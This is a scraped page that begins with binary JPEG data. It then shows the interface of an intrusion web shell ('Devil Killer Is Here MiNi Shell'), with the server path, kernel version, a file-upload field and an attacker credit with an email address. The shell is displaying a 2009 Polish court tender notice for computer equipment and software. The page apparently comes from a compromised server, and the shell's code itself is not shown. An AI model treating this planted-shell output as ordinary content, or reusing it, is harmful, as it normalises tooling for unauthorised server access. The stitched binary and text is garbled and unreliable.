JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/168686-N-2009.html

<p class="kh_header"><b>Suwałki: Zadanie I - dostawa sprzętu komputerowego i akcesoriów komputerowych do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45,
Zadanie II - dostawa oprogramowania do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45</b><br>
<b>Numer ogłoszenia: 168686 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Suwałkach , ul. Waryńskiego 45, 16-400 Suwałki, woj. podlaskie, tel. 087 5631300, faks 087 5631303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suwalki.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie I - dostawa sprzętu komputerowego i akcesoriów komputerowych do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45,
Zadanie II - dostawa oprogramowania do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I - dostawa sprzętu komputerowego i akcesoriów komputerowych do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45, obejmująca:
1)	stacja robocza - szt. 8,
2)	drukarka A4 - szt. 8,
3)	drukarka przenośna A4 - 1 szt.,
4)	zasilacz awaryjny (UPS) - 6 szt.,
5)	zasilacz awaryjny (UPS) - 1 szt.,
6)	komputer przenośny - 2 szt.,
7)	akcesoria komputerowe: przełącznik aktywny - 3 szt., Pamięć DDR2 SO-DIMM - 4 szt., Pamięć DDR3 DIMM - 6 szt., Pamięć DDR2 DIMM - 10 szt., Pamięć microSDHC - 4 szt., Procesor - 1 szt., Płyta główna - 1 szt., Mysz optyczna PS2 - 10 szt., Mysz optyczna USB - 10 szt., Akumulator AA - 24 szt., Akumulator UPS - 1 szt., Przedłużacz USB2 - 10 szt., Backplane - 1 szt., Chusteczki do monitorów LCD - 200 szt,
zgodnie z Załącznikiem Nr 1/I do SIWZ - Specyfikacja produktu.

Zadanie II - dostawa oprogramowania do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45, obejmująca:
1)	Symantec Endpoint Protection 11 PL - 10 szt., 
2)	Microsoft Word - 3 szt., 
3)	Microsoft Office Standard - 7 szt., 
4)	Microsoft Windows 2008 - 1 szt., 
5)	Microsoft Exchange CAL - 10 szt., 
6)	SecureDoc Disc Encryption - 2 szt., 
7)	Norton Internert Security 2010 BOX PL - 1 szt,
8)	ABBYY Lingvo x3 PC + Mobile - 1 szt.

zgodnie z Załącznikiem Nr 1/II do SIWZ - Specyfikacja produktu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.40.00-2, 30.23.21.10-8, 30.21.31.00-6, 30.23.72.00-1, 48.51.70.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia  mogą ubiegać się wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 

1)	Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 1 na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w rozdziale VII SIWZ.
2)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca /spełnia/ albo /nie spełnia/ poszczególne warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące oświadczenia i dokumenty:
1)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 1- 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( t.j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) -  Załącznik nr 3 do oferty;
2)	aktualny odpis z właściwego rejestru (np. Krajowego Rejestru Sądowego) albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia właściciela/ właścicieli firmy w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 m-cy przed upływem terminu składania ofert;
4)	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - kopia dokumentu ( dokumentów ) poświadczona za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy,
5)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat, oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6)	Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik.
2.	Ofertę należy złożyć na formularzu ofertowym - Załącznik Nr 2
3.	Do oferty należy dołączyć:
a)	Specyfikacja produktu - Załącznik Nr 1/I, Załącznik Nr 1/II
b)	formularz cenowy - Załącznik Nr 4/I, Załącznik Nr 4/II
c)	parafowany formularz umowy - Załącznik Nr 5/I, Załącznik Nr 5/II
d)	wymagane certyfikaty i dokumenty określone w Specyfikacji Produktu, stanowiącej Załączniku 
Nr 1/I do SIWZ.
4.	Zasady składania oferty przez podmioty występujące wspólnie:
1)	Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia - oryginał dokumentu lub kserokopia z podpisem notarialnie poświadczonym.
2)	Wymagane oświadczenia i dokumenty, o których mowa w pkt 1 powinny być złożone przez każdy podmiot, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/osoby uprawnioną/ne do reprezentowania wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.suwalki.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Suwałkach ul. Waryńskiego 45, 16-400 Suwałki, pokój nr 136.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Biuro Podawcze Sądu Okręgowego w Suwałkach przy ul. Waryńskiego 45, 16-400 Suwałki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego i akcesoriów komputerowych do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego i akcesoriów komputerowych do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45, obejmująca:
1)	stacja robocza - szt. 8,
2)	drukarka A4 - szt. 8,
3)	drukarka przenośna A4 - 1 szt.,
4)	zasilacz awaryjny (UPS) - 6 szt.,
5)	zasilacz awaryjny (UPS) - 1 szt.,
6)	komputer przenośny - 2 szt.,
7)	akcesoria komputerowe: przełącznik aktywny - 3 szt., Pamięć DDR2 SO-DIMM - 4 szt., Pamięć DDR3 DIMM - 6 szt., Pamięć DDR2 DIMM - 10 szt., Pamięć microSDHC - 4 szt., Procesor - 1 szt., Płyta główna - 1 szt., Mysz optyczna PS2 - 10 szt., Mysz optyczna USB - 10 szt., Akumulator AA - 24 szt., Akumulator UPS - 1 szt., Przedłużacz USB2 - 10 szt., Backplane - 1 szt., Chusteczki do monitorów LCD - 200 szt,
zgodnie z Załącznikiem Nr 1/I do SIWZ - Specyfikacja produktu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.40.00-2, 30.23.21.10-8, 30.21.31.00-6, 30.23.72.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oprogramowania do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa oprogramowania do Sądu Okręgowego w Suwałkach ul. Waryńskiego 45, obejmująca:
1)	Symantec Endpoint Protection 11 PL - 10 szt., 
2)	Microsoft Word - 3 szt., 
3)	Microsoft Office Standard - 7 szt., 
4)	Microsoft Windows 2008 - 1 szt., 
5)	Microsoft Exchange CAL - 10 szt., 
6)	SecureDoc Disc Encryption - 2 szt., 
7)	Norton Internert Security 2010 BOX PL - 1 szt,
8)	ABBYY Lingvo x3 PC + Mobile - 1 szt.

zgodnie z Załącznikiem Nr 1/II do SIWZ - Specyfikacja produktu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.51.70.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com